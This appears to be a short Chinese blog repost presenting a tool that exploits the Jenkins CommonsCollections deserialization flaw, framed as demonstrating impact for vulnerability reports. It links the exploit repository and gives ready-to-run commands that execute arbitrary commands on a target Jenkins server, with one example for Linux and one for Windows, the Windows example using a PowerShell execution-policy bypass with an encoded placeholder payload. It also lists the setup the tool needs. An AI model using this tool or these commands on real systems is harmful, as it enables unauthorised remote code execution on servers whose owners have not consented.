[转]Jenkins CommonCollections 完美利用（演示）工具

提交漏洞总是要证明漏洞危害，老外写的java代码又有bug，所以随手改掉了

点击这里下载代码，或者使用如下命令

git clone https://github.com/CaledoniaProject/jenkins-cli-exploit.git

来张截图吧，

工具的具体使用方法，

如果目标是 Linux、Mac 机器，请使用，

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd ‘{ whoami; ls -lh; } > /tmp/hacked‘

如果是 Windows 机器，

./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd ‘powershell -ep bypass -enc xxxxx‘

环境要求，

1. 确保你安装了 java、perl
2. 确保你安装了 IPC::Run 这个PERL模块，安装方法为 cpan IPC::Run